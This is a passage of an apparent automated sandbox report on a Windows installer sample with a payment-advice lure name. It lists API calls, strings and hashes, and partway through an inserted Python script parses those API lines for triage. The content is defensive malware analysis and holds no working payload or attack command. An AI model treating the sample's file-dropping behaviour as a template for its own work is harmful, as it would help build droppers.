• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
• RegisterClassW.USER32(00428180), ref: 00403A59
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
• ShowWindow.USER32(00000005,00000000), ref: 00403ADC
• LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
• LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
• GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
• GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
• RegisterClassW.USER32(00428180), ref: 00403B1E
• DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 914957316-1115850852
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
• GetDlgItem.USER32(?,000003E8), ref: 0040437E
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
• GetSysColor.USER32(?), ref: 004043AC
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
• lstrlenW.KERNEL32(?), ref: 004043CD
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
• GetDlgItem.USER32(?,0000040A), ref: 00404448
• SendMessageW.USER32(00000000), ref: 0040444F
• GetDlgItem.USER32(?,000003E8), ref: 0040447A
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
• LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
• SetCursor.USER32(00000000), ref: 004044CE
• ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
• LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
• SetCursor.USER32(00000000), ref: 004044F2
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: CB@$N$open
• API String ID: 3615053054-4029390422
APIs
• lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
• GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
• GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
• wsprintfA.USER32 ref: 00405C80
• GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                          • API String ID: 1265525490-3322868524
                                                                                                                                          • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                          • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                          • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                                                          • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                          APIs
                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                          • String ID: F
                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                          • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                          • lstrcatW.KERNEL32(?,00427180), ref: 0040473D
                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                            • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061E1
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061F5
                                                                                                                                            • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 00406208
                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                          • String ID: A
                                                                                                                                          • API String ID: 2246997448-3554254475
                                                                                                                                          • Opcode ID: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                          • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                          • Opcode Fuzzy Hash: 7bae5448d950fa7fc9b780a264b0000045a755fe0574635acf906d6e28ab15ff
                                                                                                                                          • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                                                            • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                                                            • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                                                                                                          Strings
                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                                          • Inst, xrefs: 00402EA3
                                                                                                                                          • Null, xrefs: 00402EB5
                                                                                                                                          • soft, xrefs: 00402EAC
                                                                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                          • API String ID: 2803837635-787788815
                                                                                                                                          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                          • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                          • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                                                          APIs
                                                                                                                                          • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                          • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                                          • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                          Strings
                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
                                                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-730719616
• Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
• Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
• Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
• Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004041B3
• GetSysColor.USER32(00000000), ref: 004041CF
• SetTextColor.GDI32(?,00000000), ref: 004041DB
• SetBkMode.GDI32(?,?), ref: 004041E7
• GetSysColor.USER32(?), ref: 004041FA
• SetBkColor.GDI32(?,?), ref: 0040420A
• DeleteObject.GDI32(?), ref: 00404224
• CreateBrushIndirect.GDI32(?), ref: 0040422E
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
• Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
• Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
• Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
  • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: File$ByteCharMultiReadWide$Pointerwsprintf
• String ID: 9
• API String ID: 1149667376-2366072709
• Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
• Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
• Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
• Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
• GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
• GlobalFree.KERNEL32(00000000), ref: 00402877
• CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID:
• API String ID: 3294113728-0
• Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
• Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
• Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
• Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
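The "APIs" bullets in these function entries are the part of the report that an analyst actually triages, so here is an added Python example (not part of the Joe Sandbox report) that parses them into structured records and runs one triage check over them: it flags a function that writes a file and later deletes it, which is the shape of the GlobalAlloc / WriteFile / CloseHandle / DeleteFileW entry just above. The sample lines are copied from that entry and from the ReadFile / wsprintfW entry before it. The per-API parameter counts and the flag names (GMEM_ZEROINIT, SW_SHOW) are assumptions taken from the Win32 SDK headers, not from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One "APIs" bullet from a Joe Sandbox function entry, in the three shapes
# that occur on this page:
#   • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
#   • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,...), ref: 00405BED
#   • GetTickCount.KERNEL32 ref: 00402D53          (no argument list at all)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Sample input copied from the two report entries above this block.
SAMPLE_DROP = """
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
• GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
• GlobalFree.KERNEL32(00000000), ref: 00402877
• CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
"""
SAMPLE_SUBCALL = """
• ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
  • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
"""

# Declared parameter counts (assumed from the Win32 SDK). The report prints the
# raw stack at the call site, so anything past these counts is caller data.
ARITY: Dict[str, int] = {"GlobalAlloc": 2, "GlobalFree": 1, "WriteFile": 5,
                         "CloseHandle": 1, "DeleteFileW": 1, "ReadFile": 5,
                         "ShowWindow": 2}
# A few flag values worth naming during triage, keyed by (api, parameter index).
# Assumed from the SDK headers, not taken from the report.
FLAG_NAMES: Dict[Tuple[str, int], Dict[int, str]] = {
    ("GlobalAlloc", 0): {0x40: "GMEM_ZEROINIT"},
    ("ShowWindow", 1): {5: "SW_SHOW"},
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[Optional[int], ...]   # None where the report prints "?"
    ref: int                          # address of the call instruction
    subcall_of: Optional[str]         # callee the report attributes the call to


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullets under an 'APIs' heading; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(None if a.strip() == "?" else int(a.strip(), 16)
                     for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def declared_args(call: ApiCall) -> List[str]:
    """Render only the parameters the API actually takes, naming known flags."""
    n = ARITY.get(call.api, len(call.args))
    out = []
    for i, a in enumerate(call.args[:n]):
        if a is None:
            out.append("?")
        else:
            out.append(FLAG_NAMES.get((call.api, i), {}).get(a, f"0x{a:X}"))
    return out


def modules_used(calls: List[ApiCall]) -> List[str]:
    return sorted({c.module for c in calls})


def writes_then_deletes(calls: List[ApiCall]) -> bool:
    """True when a WriteFile call site precedes a DeleteFileW call site in one
    function body: the write-temporary-file-then-remove-it shape of this entry."""
    writes = [c.ref for c in calls if c.api == "WriteFile"]
    deletes = [c.ref for c in calls if c.api == "DeleteFileW"]
    return any(w < d for w in writes for d in deletes)


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_DROP):
        print(f"{c.ref:08X} {c.module}!{c.api}({', '.join(declared_args(c))})")
    print("write-then-delete:", writes_then_deletes(parse_api_lines(SAMPLE_DROP)))
```

The arity cut matters when reading these listings: GlobalAlloc takes two parameters, yet the report shows thirteen values after it, and the 40000000 and 00000002 that follow are the caller's own stack, so they must not be read as GlobalAlloc flags. The heuristic orders calls by the ref address rather than by listing order, which is what the report's ref values encode.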
APIs
• lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
• lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
• lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
• SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
